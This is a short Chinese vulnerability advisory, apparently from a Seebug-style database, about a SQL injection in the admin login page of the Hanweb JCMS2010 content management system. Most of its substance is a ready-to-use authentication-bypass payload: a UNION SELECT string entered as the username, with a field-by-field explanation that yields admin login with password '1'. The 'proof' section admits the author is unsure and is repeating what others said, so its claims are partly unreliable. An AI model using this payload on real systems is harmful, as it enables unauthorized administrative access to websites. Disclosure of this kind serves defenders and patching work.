大汉版通JCMS内容管理系统SQL注射漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 大汉版通JCMS内容管理系统某处参数未经处理即入库查询导致SQL注射漏洞产生,可利用来登录后台等,当前测试存在该漏洞的版本为JCMS2010。 ### 详细说明: 1. 大汉版通JCMS内容管理系统(JCMS2010)默认后台登录页中由于用户名未经处理即带入数据库查询产生SQL注射漏洞。 2. 利用测试: 后台登录页:http://www.target.com/jcms/ 用户名:x' union select '00000','admin','AEY=',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual-- 密码:1 其中'00000'是验证管理员用户组的一个字段;'admin'是管理员用户名;'AEY='加密密码,解密后为'1';后面的'1'表示帐号启用。 ### 漏洞证明: 我不大清楚,别人说是这么回事,说厂家官网也存在这个漏洞: [<img src="https://images.seebug.org/upload/201309/18180153f376bf6388d2390649b64808fb6e3744.jpg" alt="hanweb.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/18180153f376bf6388d2390649b64808fb6e3744.jpg)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息